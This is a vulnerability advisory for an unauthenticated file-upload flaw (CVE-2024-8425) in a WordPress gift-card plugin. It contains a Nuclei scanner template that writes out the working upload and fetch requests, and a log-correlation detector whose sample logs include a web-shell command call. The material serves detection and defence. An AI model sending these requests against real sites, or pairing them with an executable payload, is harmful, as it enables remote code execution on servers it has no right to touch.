The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
PoC code [publicly disclosed]
id: CVE-2024-8425

info:
  name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
  author: jsnv-dev
  severity: critical
  description: |
    The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  impact: |
    Unauthenticated attackers can upload arbitrary files, including PHP scripts, to the web server because the file type is not validated. If the upload directory is served and executes PHP, this leads to remote code execution and full compromise of the web server.
  remediation: |
    Update the WooCommerce Ultimate Gift Card plugin to a version later than 2.6.0 that addresses the arbitrary file upload vulnerability in the mwb_wgm_preview_mail and mwb_wgm_woocommerce_add_cart_item_data functions.
  reference:
    - https://github.com/KTN1990/CVE-2024-8425
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8425
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8425
    epss-score: 0.64114
    epss-percentile: 0.98382
    cwe-id: CWE-434
    cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpswings
    product: woocommerce_ultimate_gift_card
    fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
  tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln

variables:
  # A harmless .txt is uploaded so the check never drops executable code on the target.
  filename: "{{rand_base(7)}}.txt"
  file_content: "{{randstr}}"
  file_message: "{{randstr}}"
  boundary_id: "{{rand_int(100000,999999)}}"

flow: http(1) && http(2)

http:
  # Step 1: unauthenticated multipart POST to the vulnerable AJAX action.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}

        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="mwb_wgm_preview_email"

        test
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="tempId"

        1
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="message"

        {{file_message}}
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundary{{boundary_id}}--

    # The handler echoes the message and the stored file name back; only continue to step 2 if it did.
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{file_message}}&name={{filename}}")'
        condition: and
        internal: true

  # Step 2: confirm the uploaded file is reachable under the plugin's upload directory.
  - raw:
      - |
        GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{file_content}}"

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - file_content
# digest: 4b0a00483046022100d6b5d8411810e37287fb672f3006b24a84e19f91dc6dc06680d635be812739f70221009a3698f6dd9e6ad5e2223d8bb0b12284db08e7697f6a008df53deb50535b9deb:922c64590222798bb761d5b6d8e72950
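The template above only tells you whether a site is exploitable. A defender looking for exploitation of this flaw after the fact wants the mirror image: the same two requests (an unauthenticated POST to admin-ajax.php with action=mwb_wgm_preview_mail, followed by a GET under /wp-content/uploads/mwb_browse/) correlated per source IP in the web server logs, with a higher severity when the fetched file has an executable extension. The script below is an added example, not part of the original page or the plugin; the Apache combined-format log lines, IP addresses, file names, five-minute window and extension list are all constructed here for illustration.

```python
import os
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed Apache "combined" access-log lines: a scanner uploading a
# harmless .txt (as the Nuclei template does), an attacker uploading and
# calling a .php file, and an unrelated image fetch from a third client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2024:12:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.5 - - [10/Sep/2024:12:00:02 +0000] "GET /wp-content/uploads/mwb_browse/abcdefg.txt HTTP/1.1" 200 37 "-" "curl/8.0"
198.51.100.9 - - [10/Sep/2024:12:05:10 +0000] "POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.9 - - [10/Sep/2024:12:05:11 +0000] "GET /wp-content/uploads/mwb_browse/shell.php?cmd=id HTTP/1.1" 200 120 "-" "python-requests/2.31"
192.0.2.7 - - [10/Sep/2024:12:10:00 +0000] "GET /wp-content/uploads/mwb_browse/cert.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

AJAX_ACTION = "mwb_wgm_preview_mail"            # vulnerable AJAX action from the advisory
UPLOAD_DIR = "/wp-content/uploads/mwb_browse/"  # upload path used by the template's second request
# Assumed set of extensions the web server may hand to the PHP interpreter.
EXEC_EXT = {".php", ".phtml", ".phar", ".php5", ".php7", ".phps"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def is_upload_request(ev):
    """True for a POST to admin-ajax.php whose query string selects the vulnerable action."""
    if ev["method"] != "POST" or not ev["path"].startswith("/wp-admin/admin-ajax.php"):
        return False
    query = ev["path"].partition("?")[2]
    return AJAX_ACTION in parse_qs(query).get("action", [])


def uploaded_file(ev):
    """Return the file name if this is a GET under the plugin's upload directory, else None."""
    if ev["method"] != "GET":
        return None
    path = ev["path"].partition("?")[0]
    if not path.startswith(UPLOAD_DIR):
        return None
    return path[len(UPLOAD_DIR):]


def detect(log_text, window=timedelta(minutes=5)):
    """Correlate, per source IP, an upload POST followed within `window` by a
    fetch from mwb_browse/. Returns a list of (ip, file_name, severity)."""
    last_upload = {}
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if is_upload_request(ev):
            last_upload[ev["ip"]] = ev["ts"]
            continue
        name = uploaded_file(ev)
        if name is None:
            continue
        t0 = last_upload.get(ev["ip"])
        if t0 is None or ev["ts"] - t0 > window:
            continue  # no recent upload from this client: ordinary media request
        ext = os.path.splitext(name)[1].lower()
        # A served executable file after an upload is the RCE case the advisory warns about.
        severity = "critical" if ext in EXEC_EXT and ev["status"] == 200 else "medium"
        alerts.append((ev["ip"], name, severity))
    return alerts


if __name__ == "__main__":
    for ip, name, severity in detect(SAMPLE_LOG):
        print(f"{severity:8} {ip:15} fetched {UPLOAD_DIR}{name} shortly after an upload POST")
```

The correlation is deliberately keyed on the upload POST rather than on the file extension alone: a scanner running the template above produces a medium alert (a .txt fetched back), while a .php fetched after the same POST is flagged critical. Both are worth investigating, since the first tells you the site was found exploitable by someone.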